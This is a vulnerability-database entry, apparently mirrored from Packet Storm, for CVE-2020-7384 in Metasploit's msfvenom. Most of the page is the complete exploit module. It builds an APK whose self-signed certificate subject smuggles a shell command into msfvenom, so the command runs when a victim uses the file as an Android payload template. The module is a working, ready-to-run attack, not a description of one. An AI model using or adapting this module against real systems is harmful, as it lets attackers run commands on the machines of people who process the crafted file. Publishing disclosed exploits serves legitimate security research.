Rapid7 Metasploit Framework msfvenom APK Template Command Injection

🗓️ 10 Nov 2020 00:00:00Reported by Justin StevenType

packetstorm🔗 packetstormsecurity.com👁 540 Views

Rapid7 Metasploit Framework msfvenom APK Template Command Injection vulnerability in payload generator for creating Android payload

Reporter	Title	Published	Views	Family All 13
0day.today	Rapid7 Metasploit Framework msfvenom APK Template Command Injection Exploit	10 Nov 202000:00	–	zdt
0day.today	Metasploit Framework 6.0.11 - msfvenom APK template command injection Exploit	28 Jan 202100:00	–	zdt
GithubExploit	Exploit for Command Injection in Rapid7 Metasploit	7 Feb 202116:00	–	githubexploit
Circl	CVE-2020-7384	10 Nov 202009:46	–	circl
CVE	CVE-2020-7384	29 Oct 202014:05	–	cve
Cvelist	CVE-2020-7384 Client-Side Command Injection in Rapid7 Metasploit	29 Oct 202014:05	–	cvelist
Exploit DB	Metasploit Framework 6.0.11 - msfvenom APK template command injection	28 Jan 202100:00	–	exploitdb
Metasploit	Rapid7 Metasploit Framework msfvenom APK Template Command Injection	10 Nov 202017:41	–	metasploit
NVD	CVE-2020-7384	29 Oct 202015:15	–	nvd
Packet Storm	Metasploit Framework 6.0.11 Command Injection	29 Jan 202100:00	–	packetstorm

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'rex/zip/jar'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FILEFORMAT  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Rapid7 Metasploit Framework msfvenom APK Template Command Injection',  
'Description' => %q{  
This module exploits a command injection vulnerability in Metasploit Framework's msfvenom  
payload generator when using a crafted APK file as an Android payload template. Affects  
Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this  
module is a relatively empty yet valid-enough APK file. To trigger the vulnerability,  
the victim user should do the following:  
  
msfvenom -p android/<...> -x <crafted_file.apk>  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Justin Steven' # @justinsteven  
],  
'References' =>  
[  
['URL', 'https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md'],  
['CVE', '2020-7384'],  
],  
'DefaultOptions' =>  
{  
'DisablePayloadHandler' => true  
},  
'Arch' => ARCH_CMD,  
'Platform' => 'unix',  
'Payload' => {  
'BadChars' => "\x22\x2c\x5c\x0a\x0d"  
},  
'Targets' => [[ 'Automatic', {}]],  
'Privileged' => false,  
'DisclosureDate' => '2020-10-29'  
)  
)  
register_options([  
OptString.new('FILENAME', [true, 'The APK file name', 'msf.apk'])  
])  
end  
  
def build_x509_name  
name = "CN=';(#{payload.encoded}) >&- 2>&- & #"  
OpenSSL::X509::Name.parse(name)  
end  
  
def generate_signing_material  
key = OpenSSL::PKey::RSA.new(2048)  
cert = OpenSSL::X509::Certificate.new  
cert.version = 2  
cert.serial = 1  
cert.subject = cert.issuer = build_x509_name  
cert.public_key = key.public_key  
cert.not_before = Time.now  
# FIXME: this will break in the year 2037 on 32-bit systems  
cert.not_after = cert.not_before + 1.year  
# Self-sign the certificate, otherwise the victim's keytool gets unhappy  
cert.sign(key, OpenSSL::Digest::SHA256.new)  
  
[cert, key]  
end  
  
def exploit  
print_warning('Warning: bash payloads are unlikely to work') if datastore['PAYLOAD'].include?('bash')  
apk = Rex::Zip::Jar.new  
apk.build_manifest  
cert, key = generate_signing_material  
apk.sign(key, cert)  
data = apk.pack  
file_create(data)  
end  
end  
`

10 Nov 2020 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.7009